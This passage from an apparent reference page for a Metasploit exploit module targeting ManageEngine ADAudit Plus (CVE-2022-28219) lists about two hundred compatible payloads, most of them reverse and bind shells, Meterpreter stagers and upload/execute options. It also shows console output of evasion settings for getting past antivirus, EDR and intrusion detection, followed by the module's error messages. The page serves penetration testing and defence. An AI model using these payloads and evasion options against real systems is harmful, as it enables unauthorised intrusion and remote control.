89 payload/cmd/windows/powershell/meterpreter/reverse_winhttp normal No Powershell Exec, Windows Reverse HTTP Stager (winhttp)
90 payload/cmd/windows/powershell/meterpreter/reverse_winhttps normal No Powershell Exec, Windows Reverse HTTPS Stager (winhttp)
91 payload/cmd/windows/powershell/metsvc_bind_tcp normal No Powershell Exec, Windows Meterpreter Service, Bind TCP
92 payload/cmd/windows/powershell/metsvc_reverse_tcp normal No Powershell Exec, Windows Meterpreter Service, Reverse TCP Inline
93 payload/cmd/windows/powershell/patchupdllinject/bind_hidden_ipknock_tcp normal No Powershell Exec, Hidden Bind Ipknock TCP Stager
94 payload/cmd/windows/powershell/patchupdllinject/bind_hidden_tcp normal No Powershell Exec, Hidden Bind TCP Stager
95 payload/cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp normal No Powershell Exec, Bind IPv6 TCP Stager (Windows x86)
96 payload/cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp_uuid normal No Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)
97 payload/cmd/windows/powershell/patchupdllinject/bind_named_pipe normal No Powershell Exec, Windows x86 Bind Named Pipe Stager
98 payload/cmd/windows/powershell/patchupdllinject/bind_nonx_tcp normal No Powershell Exec, Bind TCP Stager (No NX or Win7)
99 payload/cmd/windows/powershell/patchupdllinject/bind_tcp normal No Powershell Exec, Bind TCP Stager (Windows x86)
100 payload/cmd/windows/powershell/patchupdllinject/bind_tcp_rc4 normal No Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)
101 payload/cmd/windows/powershell/patchupdllinject/bind_tcp_uuid normal No Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)
102 payload/cmd/windows/powershell/patchupdllinject/reverse_ipv6_tcp normal No Powershell Exec, Reverse TCP Stager (IPv6)
103 payload/cmd/windows/powershell/patchupdllinject/reverse_nonx_tcp normal No Powershell Exec, Reverse TCP Stager (No NX or Win7)
104 payload/cmd/windows/powershell/patchupdllinject/reverse_ord_tcp normal No Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)
105 payload/cmd/windows/powershell/patchupdllinject/reverse_tcp normal No Powershell Exec, Reverse TCP Stager
106 payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_allports normal No Powershell Exec, Reverse All-Port TCP Stager
107 payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_dns normal No Powershell Exec, Reverse TCP Stager (DNS)
108 payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4 normal No Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
109 payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4_dns normal No Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
110 payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_uuid normal No Powershell Exec, Reverse TCP Stager with UUID Support
111 payload/cmd/windows/powershell/patchupmeterpreter/bind_hidden_ipknock_tcp normal No Powershell Exec, Hidden Bind Ipknock TCP Stager
112 payload/cmd/windows/powershell/patchupmeterpreter/bind_hidden_tcp normal No Powershell Exec, Hidden Bind TCP Stager
113 payload/cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp normal No Powershell Exec, Bind IPv6 TCP Stager (Windows x86)
114 payload/cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp_uuid normal No Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)
115 payload/cmd/windows/powershell/patchupmeterpreter/bind_named_pipe normal No Powershell Exec, Windows x86 Bind Named Pipe Stager
116 payload/cmd/windows/powershell/patchupmeterpreter/bind_nonx_tcp normal No Powershell Exec, Bind TCP Stager (No NX or Win7)
117 payload/cmd/windows/powershell/patchupmeterpreter/bind_tcp normal No Powershell Exec, Bind TCP Stager (Windows x86)
118 payload/cmd/windows/powershell/patchupmeterpreter/bind_tcp_rc4 normal No Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)
119 payload/cmd/windows/powershell/patchupmeterpreter/bind_tcp_uuid normal No Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)
120 payload/cmd/windows/powershell/patchupmeterpreter/reverse_ipv6_tcp normal No Powershell Exec, Reverse TCP Stager (IPv6)
121 payload/cmd/windows/powershell/patchupmeterpreter/reverse_nonx_tcp normal No Powershell Exec, Reverse TCP Stager (No NX or Win7)
122 payload/cmd/windows/powershell/patchupmeterpreter/reverse_ord_tcp normal No Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)
123 payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp normal No Powershell Exec, Reverse TCP Stager
124 payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_allports normal No Powershell Exec, Reverse All-Port TCP Stager
125 payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_dns normal No Powershell Exec, Reverse TCP Stager (DNS)
126 payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4 normal No Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
127 payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4_dns normal No Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
128 payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_uuid normal No Powershell Exec, Reverse TCP Stager with UUID Support
129 payload/cmd/windows/powershell/peinject/bind_hidden_ipknock_tcp normal No Powershell Exec, Hidden Bind Ipknock TCP Stager
130 payload/cmd/windows/powershell/peinject/bind_hidden_tcp normal No Powershell Exec, Hidden Bind TCP Stager
131 payload/cmd/windows/powershell/peinject/bind_ipv6_tcp normal No Powershell Exec, Bind IPv6 TCP Stager (Windows x86)
132 payload/cmd/windows/powershell/peinject/bind_ipv6_tcp_uuid normal No Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)
133 payload/cmd/windows/powershell/peinject/bind_named_pipe normal No Powershell Exec, Windows x86 Bind Named Pipe Stager
134 payload/cmd/windows/powershell/peinject/bind_nonx_tcp normal No Powershell Exec, Bind TCP Stager (No NX or Win7)
135 payload/cmd/windows/powershell/peinject/bind_tcp normal No Powershell Exec, Bind TCP Stager (Windows x86)
136 payload/cmd/windows/powershell/peinject/bind_tcp_rc4 normal No Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)
137 payload/cmd/windows/powershell/peinject/bind_tcp_uuid normal No Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)
138 payload/cmd/windows/powershell/peinject/reverse_ipv6_tcp normal No Powershell Exec, Reverse TCP Stager (IPv6)
139 payload/cmd/windows/powershell/peinject/reverse_named_pipe normal No Powershell Exec, Windows x86 Reverse Named Pipe (SMB) Stager
140 payload/cmd/windows/powershell/peinject/reverse_nonx_tcp normal No Powershell Exec, Reverse TCP Stager (No NX or Win7)
141 payload/cmd/windows/powershell/peinject/reverse_ord_tcp normal No Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)
142 payload/cmd/windows/powershell/peinject/reverse_tcp normal No Powershell Exec, Reverse TCP Stager
143 payload/cmd/windows/powershell/peinject/reverse_tcp_allports normal No Powershell Exec, Reverse All-Port TCP Stager
144 payload/cmd/windows/powershell/peinject/reverse_tcp_dns normal No Powershell Exec, Reverse TCP Stager (DNS)
145 payload/cmd/windows/powershell/peinject/reverse_tcp_rc4 normal No Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
146 payload/cmd/windows/powershell/peinject/reverse_tcp_rc4_dns normal No Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
147 payload/cmd/windows/powershell/peinject/reverse_tcp_uuid normal No Powershell Exec, Reverse TCP Stager with UUID Support
148 payload/cmd/windows/powershell/pingback_bind_tcp normal No Powershell Exec, Windows x86 Pingback, Bind TCP Inline
149 payload/cmd/windows/powershell/pingback_reverse_tcp normal No Powershell Exec, Windows x86 Pingback, Reverse TCP Inline
150 payload/cmd/windows/powershell/powershell_bind_tcp normal No Powershell Exec
151 payload/cmd/windows/powershell/powershell_reverse_tcp normal No Powershell Exec
152 payload/cmd/windows/powershell/powershell_reverse_tcp_ssl normal No Powershell Exec
153 payload/cmd/windows/powershell/shell/bind_hidden_ipknock_tcp normal No Powershell Exec, Windows Command Shell, Hidden Bind Ipknock TCP Stager
154 payload/cmd/windows/powershell/shell/bind_hidden_tcp normal No Powershell Exec, Windows Command Shell, Hidden Bind TCP Stager
155 payload/cmd/windows/powershell/shell/bind_ipv6_tcp normal No Powershell Exec, Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)
156 payload/cmd/windows/powershell/shell/bind_ipv6_tcp_uuid normal No Powershell Exec, Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)
157 payload/cmd/windows/powershell/shell/bind_named_pipe normal No Powershell Exec, Windows Command Shell, Windows x86 Bind Named Pipe Stager
158 payload/cmd/windows/powershell/shell/bind_nonx_tcp normal No Powershell Exec, Windows Command Shell, Bind TCP Stager (No NX or Win7)
159 payload/cmd/windows/powershell/shell/bind_tcp normal No Powershell Exec, Windows Command Shell, Bind TCP Stager (Windows x86)
160 payload/cmd/windows/powershell/shell/bind_tcp_rc4 normal No Powershell Exec, Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
161 payload/cmd/windows/powershell/shell/bind_tcp_uuid normal No Powershell Exec, Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)
162 payload/cmd/windows/powershell/shell/reverse_ipv6_tcp normal No Powershell Exec, Windows Command Shell, Reverse TCP Stager (IPv6)
163 payload/cmd/windows/powershell/shell/reverse_nonx_tcp normal No Powershell Exec, Windows Command Shell, Reverse TCP Stager (No NX or Win7)
164 payload/cmd/windows/powershell/shell/reverse_ord_tcp normal No Powershell Exec, Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
165 payload/cmd/windows/powershell/shell/reverse_tcp normal No Powershell Exec, Windows Command Shell, Reverse TCP Stager
166 payload/cmd/windows/powershell/shell/reverse_tcp_allports normal No Powershell Exec, Windows Command Shell, Reverse All-Port TCP Stager
167 payload/cmd/windows/powershell/shell/reverse_tcp_dns normal No Powershell Exec, Windows Command Shell, Reverse TCP Stager (DNS)
168 payload/cmd/windows/powershell/shell/reverse_tcp_rc4 normal No Powershell Exec, Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
169 payload/cmd/windows/powershell/shell/reverse_tcp_rc4_dns normal No Powershell Exec, Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
170 payload/cmd/windows/powershell/shell/reverse_tcp_uuid normal No Powershell Exec, Windows Command Shell, Reverse TCP Stager with UUID Support
171 payload/cmd/windows/powershell/shell/reverse_udp normal No Powershell Exec, Windows Command Shell, Reverse UDP Stager with UUID Support
172 payload/cmd/windows/powershell/shell_bind_tcp normal No Powershell Exec, Windows Command Shell, Bind TCP Inline
173 payload/cmd/windows/powershell/shell_bind_tcp_xpfw normal No Powershell Exec, Windows Disable Windows ICF, Command Shell, Bind TCP Inline
174 payload/cmd/windows/powershell/shell_hidden_bind_tcp normal No Powershell Exec, Windows Command Shell, Hidden Bind TCP Inline
175 payload/cmd/windows/powershell/shell_reverse_tcp normal No Powershell Exec, Windows Command Shell, Reverse TCP Inline
176 payload/cmd/windows/powershell/speak_pwned normal No Powershell Exec
177 payload/cmd/windows/powershell/upexec/bind_hidden_ipknock_tcp normal No Powershell Exec, Windows Upload/Execute, Hidden Bind Ipknock TCP Stager
178 payload/cmd/windows/powershell/upexec/bind_hidden_tcp normal No Powershell Exec, Windows Upload/Execute, Hidden Bind TCP Stager
179 payload/cmd/windows/powershell/upexec/bind_ipv6_tcp normal No Powershell Exec, Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)
180 payload/cmd/windows/powershell/upexec/bind_ipv6_tcp_uuid normal No Powershell Exec, Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)
181 payload/cmd/windows/powershell/upexec/bind_named_pipe normal No Powershell Exec, Windows Upload/Execute, Windows x86 Bind Named Pipe Stager
182 payload/cmd/windows/powershell/upexec/bind_nonx_tcp normal No Powershell Exec, Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
183 payload/cmd/windows/powershell/upexec/bind_tcp normal No Powershell Exec, Windows Upload/Execute, Bind TCP Stager (Windows x86)
184 payload/cmd/windows/powershell/upexec/bind_tcp_rc4 normal No Powershell Exec, Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm)
185 payload/cmd/windows/powershell/upexec/bind_tcp_uuid normal No Powershell Exec, Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)
186 payload/cmd/windows/powershell/upexec/reverse_ipv6_tcp normal No Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (IPv6)
187 payload/cmd/windows/powershell/upexec/reverse_nonx_tcp normal No Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
188 payload/cmd/windows/powershell/upexec/reverse_ord_tcp normal No Powershell Exec, Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
189 payload/cmd/windows/powershell/upexec/reverse_tcp normal No Powershell Exec, Windows Upload/Execute, Reverse TCP Stager
190 payload/cmd/windows/powershell/upexec/reverse_tcp_allports normal No Powershell Exec, Windows Upload/Execute, Reverse All-Port TCP Stager
191 payload/cmd/windows/powershell/upexec/reverse_tcp_dns normal No Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (DNS)
192 payload/cmd/windows/powershell/upexec/reverse_tcp_rc4 normal No Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
193 payload/cmd/windows/powershell/upexec/reverse_tcp_rc4_dns normal No Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
194 payload/cmd/windows/powershell/upexec/reverse_tcp_uuid normal No Powershell Exec, Windows Upload/Execute, Reverse TCP Stager with UUID Support
195 payload/cmd/windows/powershell/upexec/reverse_udp normal No Powershell Exec, Windows Upload/Execute, Reverse UDP Stager with UUID Support
196 payload/cmd/windows/powershell/vncinject/bind_hidden_ipknock_tcp normal No Powershell Exec, Hidden Bind Ipknock TCP Stager
197 payload/cmd/windows/powershell/vncinject/bind_hidden_tcp normal No Powershell Exec, Hidden Bind TCP Stager
198 payload/cmd/windows/powershell/vncinject/bind_ipv6_tcp normal No Powershell Exec, Bind IPv6 TCP Stager (Windows x86)
199 payload/cmd/windows/powershell/vncinject/bind_ipv6_tcp_uuid normal No Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)
200 payload/cmd/windows/powershell/vncinject/bind_named_pipe normal No Powershell Exec, Windows x86 Bind Named Pipe Stager
201 payload/cmd/windows/powershell/vncinject/bind_nonx_tcp normal No Powershell Exec, Bind TCP Stager (No NX or Win7)
202 payload/cmd/windows/powershell/vncinject/bind_tcp normal No Powershell Exec, Bind TCP Stager (Windows x86)
203 payload/cmd/windows/powershell/vncinject/bind_tcp_rc4 normal No Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)
204 payload/cmd/windows/powershell/vncinject/bind_tcp_uuid normal No Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)
205 payload/cmd/windows/powershell/vncinject/reverse_hop_http normal No Powershell Exec, Reverse Hop HTTP/HTTPS Stager
206 payload/cmd/windows/powershell/vncinject/reverse_http normal No Powershell Exec, Windows Reverse HTTP Stager (wininet)
207 payload/cmd/windows/powershell/vncinject/reverse_http_proxy_pstore normal No Powershell Exec, Reverse HTTP Stager Proxy
208 payload/cmd/windows/powershell/vncinject/reverse_ipv6_tcp normal No Powershell Exec, Reverse TCP Stager (IPv6)
209 payload/cmd/windows/powershell/vncinject/reverse_nonx_tcp normal No Powershell Exec, Reverse TCP Stager (No NX or Win7)
210 payload/cmd/windows/powershell/vncinject/reverse_ord_tcp normal No Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)
211 payload/cmd/windows/powershell/vncinject/reverse_tcp normal No Powershell Exec, Reverse TCP Stager
212 payload/cmd/windows/powershell/vncinject/reverse_tcp_allports normal No Powershell Exec, Reverse All-Port TCP Stager
213 payload/cmd/windows/powershell/vncinject/reverse_tcp_dns normal No Powershell Exec, Reverse TCP Stager (DNS)
214 payload/cmd/windows/powershell/vncinject/reverse_tcp_rc4 normal No Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
215 payload/cmd/windows/powershell/vncinject/reverse_tcp_rc4_dns normal No Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
216 payload/cmd/windows/powershell/vncinject/reverse_tcp_uuid normal No Powershell Exec, Reverse TCP Stager with UUID Support
217 payload/cmd/windows/powershell/vncinject/reverse_winhttp normal No Powershell Exec, Windows Reverse HTTP Stager (winhttp)
218 payload/cmd/windows/powershell/x64/custom/bind_ipv6_tcp normal No Powershell Exec, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager
219 payload/cmd/windows/powershell/x64/custom/bind_ipv6_tcp_uuid normal No Powershell Exec, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support
220 payload/cmd/windows/powershell/x64/custom/bind_named_pipe normal No Powershell Exec, Windows shellcode stage, Windows x64 Bind Named Pipe Stager
221 payload/cmd/windows/powershell/x64/custom/bind_tcp normal No Powershell Exec, Windows shellcode stage, Windows x64 Bind TCP Stager
222 payload/cmd/windows/powershell/x64/custom/bind_tcp_rc4 normal No Powershell Exec, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)
223 payload/cmd/windows/powershell/x64/custom/bind_tcp_uuid normal No Powershell Exec, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)
224 payload/cmd/windows/powershell/x64/custom/reverse_http normal No Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)
225 payload/cmd/windows/powershell/x64/custom/reverse_https normal No Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)
226 payload/cmd/windows/powershell/x64/custom/reverse_named_pipe normal No Powershell Exec, Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager
227 payload/cmd/windows/powershell/x64/custom/reverse_tcp normal No Powershell Exec, Windows shellcode stage, Windows x64 Reverse TCP Stager
228 payload/cmd/windows/powershell/x64/custom/reverse_tcp_rc4 normal No Powershell Exec, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
229 payload/cmd/windows/powershell/x64/custom/reverse_tcp_uuid normal No Powershell Exec, Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)
230 payload/cmd/windows/powershell/x64/custom/reverse_winhttp normal No Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)
231 payload/cmd/windows/powershell/x64/custom/reverse_winhttps normal No Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)
232 payload/cmd/windows/powershell/x64/exec normal No Powershell Exec, Windows x64 Execute Command
233 payload/cmd/windows/powershell/x64/loadlibrary normal No Powershell Exec, Windows x64 LoadLibrary Path
234 payload/cmd/windows/powershell/x64/messagebox normal No Powershell Exec, Windows MessageBox x64
235 payload/cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp normal No Powershell Exec, Windows x64 IPv6 Bind TCP Stager
236 payload/cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp_uuid normal No Powershell Exec, Windows x64 IPv6 Bind TCP Stager with UUID Support
237 payload/cmd/windows/powershell/x64/meterpreter/bind_named_pipe normal No Powershell Exec, Windows x64 Bind Named Pipe Stager
238 payload/cmd/windows/powershell/x64/meterpreter/bind_tcp normal No Powershell Exec, Windows x64 Bind TCP Stager
239 payload/cmd/windows/powershell/x64/meterpreter/bind_tcp_rc4 normal No Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)
240 payload/cmd/windows/powershell/x64/meterpreter/bind_tcp_uuid normal No Powershell Exec, Bind TCP Stager with UUID Support (Windows x64)
241 payload/cmd/windows/powershell/x64/meterpreter/reverse_http normal No Powershell Exec, Windows x64 Reverse HTTP Stager (wininet)
242 payload/cmd/windows/powershell/x64/meterpreter/reverse_https normal No Powershell Exec, Windows x64 Reverse HTTP Stager (wininet)
243 payload/cmd/windows/powershell/x64/meterpreter/reverse_named_pipe normal No Powershell Exec, Windows x64 Reverse Named Pipe (SMB) Stager
244 payload/cmd/windows/powershell/x64/meterpreter/reverse_tcp normal No Powershell Exec, Windows x64 Reverse TCP Stager
245 payload/cmd/windows/powershell/x64/meterpreter/reverse_tcp_rc4 normal No Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
246 payload/cmd/windows/powershell/x64/meterpreter/reverse_tcp_uuid normal No Powershell Exec, Reverse TCP Stager with UUID Support (Windows x64)
247 payload/cmd/windows/powershell/x64/meterpreter/reverse_winhttp normal No Powershell Exec, Windows x64 Reverse HTTP Stager (winhttp)
248 payload/cmd/windows/powershell/x64/meterpreter/reverse_winhttps normal No Powershell Exec, Windows x64 Reverse HTTPS Stager (winhttp)
249 payload/cmd/windows/powershell/x64/peinject/bind_ipv6_tcp normal No Powershell Exec, Windows x64 IPv6 Bind TCP Stager
250 payload/cmd/windows/powershell/x64/peinject/bind_ipv6_tcp_uuid normal No Powershell Exec, Windows x64 IPv6 Bind TCP Stager with UUID Support
251 payload/cmd/windows/powershell/x64/peinject/bind_named_pipe normal No Powershell Exec, Windows x64 Bind Named Pipe Stager
252 payload/cmd/windows/powershell/x64/peinject/bind_tcp normal No Powershell Exec, Windows x64 Bind TCP Stager
253 payload/cmd/windows/powershell/x64/peinject/bind_tcp_rc4 normal No Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)
254 payload/cmd/windows/powershell/x64/peinject/bind_tcp_uuid normal No Powershell Exec, Bind TCP Stager with UUID Support (Windows x64)
255 payload/cmd/windows/powershell/x64/peinject/reverse_named_pipe normal No Powershell Exec, Windows x64 Reverse Named Pipe (SMB) Stager
256 payload/cmd/windows/powershell/x64/peinject/reverse_tcp normal No Powershell Exec, Windows x64 Reverse TCP Stager
257 payload/cmd/windows/powershell/x64/peinject/reverse_tcp_rc4 normal No Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
258 payload/cmd/windows/powershell/x64/peinject/reverse_tcp_uuid normal No Powershell Exec, Reverse TCP Stager with UUID Support (Windows x64)
259 payload/cmd/windows/powershell/x64/pingback_reverse_tcp normal No Powershell Exec, Windows x64 Pingback, Reverse TCP Inline
260 payload/cmd/windows/powershell/x64/powershell_bind_tcp normal No Powershell Exec
261 payload/cmd/windows/powershell/x64/powershell_reverse_tcp normal No Powershell Exec
262 payload/cmd/windows/powershell/x64/powershell_reverse_tcp_ssl normal No Powershell Exec
263 payload/cmd/windows/powershell/x64/shell/bind_ipv6_tcp normal No Powershell Exec, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
264 payload/cmd/windows/powershell/x64/shell/bind_ipv6_tcp_uuid normal No Powershell Exec, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
265 payload/cmd/windows/powershell/x64/shell/bind_named_pipe normal No Powershell Exec, Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager
266 payload/cmd/windows/powershell/x64/shell/bind_tcp normal No Powershell Exec, Windows x64 Command Shell, Windows x64 Bind TCP Stager
267 payload/cmd/windows/powershell/x64/shell/bind_tcp_rc4 normal No Powershell Exec, Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
268 payload/cmd/windows/powershell/x64/shell/bind_tcp_uuid normal No Powershell Exec, Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
269 payload/cmd/windows/powershell/x64/shell/reverse_tcp normal No Powershell Exec, Windows x64 Command Shell, Windows x64 Reverse TCP Stager
270 payload/cmd/windows/powershell/x64/shell/reverse_tcp_rc4 normal No Powershell Exec, Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
271 payload/cmd/windows/powershell/x64/shell/reverse_tcp_uuid normal No Powershell Exec, Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
272 payload/cmd/windows/powershell/x64/shell_bind_tcp normal No Powershell Exec, Windows x64 Command Shell, Bind TCP Inline
273 payload/cmd/windows/powershell/x64/shell_reverse_tcp normal No Powershell Exec, Windows x64 Command Shell, Reverse TCP Inline
274 payload/cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp normal No Powershell Exec, Windows x64 IPv6 Bind TCP Stager
275 payload/cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp_uuid normal No Powershell Exec, Windows x64 IPv6 Bind TCP Stager with UUID Support
276 payload/cmd/windows/powershell/x64/vncinject/bind_named_pipe normal No Powershell Exec, Windows x64 Bind Named Pipe Stager
277 payload/cmd/windows/powershell/x64/vncinject/bind_tcp normal No Powershell Exec, Windows x64 Bind TCP Stager
278 payload/cmd/windows/powershell/x64/vncinject/bind_tcp_rc4 normal No Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)
279 payload/cmd/windows/powershell/x64/vncinject/bind_tcp_uuid normal No Powershell Exec, Bind TCP Stager with UUID Support (Windows x64)
280 payload/cmd/windows/powershell/x64/vncinject/reverse_http normal No Powershell Exec, Windows x64 Reverse HTTP Stager (wininet)
281 payload/cmd/windows/powershell/x64/vncinject/reverse_https normal No Powershell Exec, Windows x64 Reverse HTTP Stager (wininet)
282 payload/cmd/windows/powershell/x64/vncinject/reverse_tcp normal No Powershell Exec, Windows x64 Reverse TCP Stager
283 payload/cmd/windows/powershell/x64/vncinject/reverse_tcp_rc4 normal No Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
284 payload/cmd/windows/powershell/x64/vncinject/reverse_tcp_uuid normal No Powershell Exec, Reverse TCP Stager with UUID Support (Windows x64)
285 payload/cmd/windows/powershell/x64/vncinject/reverse_winhttp normal No Powershell Exec, Windows x64 Reverse HTTP Stager (winhttp)
286 payload/cmd/windows/powershell/x64/vncinject/reverse_winhttps normal No Powershell Exec, Windows x64 Reverse HTTPS Stager (winhttp)
287 payload/cmd/windows/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP
288 payload/cmd/windows/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP
289 payload/cmd/windows/powershell_reverse_tcp_ssl normal No Windows Interactive Powershell Session, Reverse TCP SSL
290 payload/cmd/windows/reverse_lua normal No Windows Command Shell, Reverse TCP (via Lua)
291 payload/cmd/windows/reverse_perl normal No Windows Command, Double Reverse TCP Connection (via Perl)
292 payload/cmd/windows/reverse_powershell normal No Windows Command Shell, Reverse TCP (via Powershell)
293 payload/cmd/windows/reverse_ruby normal No Windows Command Shell, Reverse TCP (via Ruby)
294 payload/generic/custom normal No Custom Payload
295 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
296 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
297 payload/generic/ssh/interact normal No Interact with Established SSH Connection
Evasion Options
Here is the full list of possible evasion options supported by the windows/http/manageengine_adaudit_plus_cve_2022_28219 exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(windows/http/manageengine_adaudit_plus_cve_2022_28219) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::chunked false no Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
HTTP::compression none no Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::junk_headers false no Enable insertion of random junk HTTP headers
HTTP::method_random_case false no Use random casing for the HTTP method
HTTP::method_random_invalid false no Use a random invalid, HTTP method for request
HTTP::method_random_valid false no Use a random, but valid, HTTP method for request
HTTP::no_cache false no Disallow the browser to cache HTTP content
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count 0 no How many fake headers to insert into the HTTP request
HTTP::pad_get_params false no Insert random, fake query string variables into the request
HTTP::pad_get_params_count 16 no How many fake query string variables to insert into the request
HTTP::pad_method_uri_count 1 no How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type space no What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
HTTP::pad_post_params false no Insert random, fake post variables into the request
HTTP::pad_post_params_count 16 no How many fake post variables to insert into the request
HTTP::pad_uri_version_count 1 no How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type space no What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
HTTP::server_name Apache yes Configures the Server header of all outgoing replies
HTTP::shuffle_get_params false no Randomize order of GET parameters
HTTP::shuffle_post_params false no Randomize order of POST parameters
HTTP::uri_dir_fake_relative false no Insert fake relative directories into the uri
HTTP::uri_dir_self_reference false no Insert self-referential directories into the uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start false no Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslashes false no Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid false no Use a random invalid, HTTP version for request
HTTP::version_random_valid false no Use a random, but valid, HTTP version for request
TCP::max_send_size 0 no Maximum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Error Messages
This module may fail with the following error messages:
- Target failed to respond to check.
- Does not appear to be ADAudit Plus
- Target failed to respond to check.
- Target does not have vulnerable endpoint (likely patched).
- The vulnerable endpoint responds with HTTP/200.
